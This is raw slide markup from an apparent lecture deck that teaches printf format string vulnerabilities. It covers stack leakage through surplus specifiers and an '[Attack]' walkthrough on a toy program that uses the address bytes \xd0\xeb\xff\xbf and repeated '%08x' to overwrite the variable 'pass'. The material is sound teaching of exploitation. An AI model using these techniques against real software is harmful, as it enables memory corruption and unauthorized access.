                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>.... </a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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\xd0 \</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
                        <a:t>xeb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> \</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
                        <a:t>xff</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> \</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
                        <a:t>xbf</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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03"/>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04"/>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05"/>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06"/>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07"/>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08"/>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09"/>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10"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="193868">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t>%      0      8       x</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10011"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="193868">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000" dirty="0"/>
                        <a:t>%      n               .  </a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10012"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="193868">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>......</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10013"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="직사각형 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386085" y="1103692"/>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1330810" y="1103763"/>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2275535" y="1100711"/>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3216381" y="1103834"/>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153280" y="1106600"/>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5097396" y="1106529"/>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6033654" y="1106600"/>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6978379" y="1103548"/>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7936159" y="1106671"/>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8879348" y="1109437"/>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9824605" y="1109437"/>
            <a:ext cx="943189" cy="279306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EF6A67">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503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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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a:xfrm>
            <a:off x="131060" y="44624"/>
            <a:ext cx="12060940" cy="5184576"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="40000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> and arguments</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>   #include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&gt;                                             &lt;output&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>                                                                                  10 20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>   int main()                                                               10 20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>4005c8 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>   {    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>        int a = 10;    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>        int b = 20;    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(“%d %d %d\n”, a, b);    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(“%d %d %d %x\n”, a, b);   </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>        return 0;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>   }</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449078" y="5373216"/>
            <a:ext cx="5354171"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endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536112" y="5373216"/>
            <a:ext cx="9808359" cy="1368152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="2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Now, here is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>The first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>printf’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> has 3 format specifier but only 2  variables a and b are given.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>However the output has 3 values, 10, 20, and 0.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>The second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> has 4 format specifier and also has 2 variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>The output has 4 values. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>These green values are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>poped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> from stack although they have no corresponding variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>This shows that we can see the stack contents using the difference  between the number of  specifiers and variables.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="직사각형 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02BEFDC6-CEA9-454D-802A-109324BA8111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263352" y="800708"/>
            <a:ext cx="4104456" cy="2988332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="2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B53F16AD-9C08-43AC-8B7B-CAEDDD61FE37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231904" y="815027"/>
            <a:ext cx="2016224" cy="1099975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="2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4629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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33"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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38"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xEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43"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923407"/>
            <a:ext cx="5472608" cy="729430"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Attack]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preparation to manipulate the variable pass.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61140" y="3644050"/>
            <a:ext cx="5801327" cy="2607781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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900" dirty="0"/>
              <a:t>Now, find the moment the value of the variable 'pass' changes by increasing "%08x".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>First,  when we execute ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>formatstirng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> command with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>this argument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> are filled.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>When main() function runs, main()’s parameter , local variables pass and buff[512]  are  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>allocated in main()’s stack frame,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>Then, when  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>() runs,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>()’s stack frame generated , in other words, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>()’s parameters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>[1], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>(buff) and buff  are pushed (in the reverse order of  the definition).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>We  note that there’s a dummy area       between  main()’s stack frame and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>()’s stack frame.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>Now, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> works. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>firts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>[1]’s  first part “\xd0 \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>” written to buff[0][1][2][3].</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>Here, “\xd0 \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>” is given since we know that the variable pass address is 0xbfffebd0 for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>this size  of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>argument</a:t>
            </a:r>
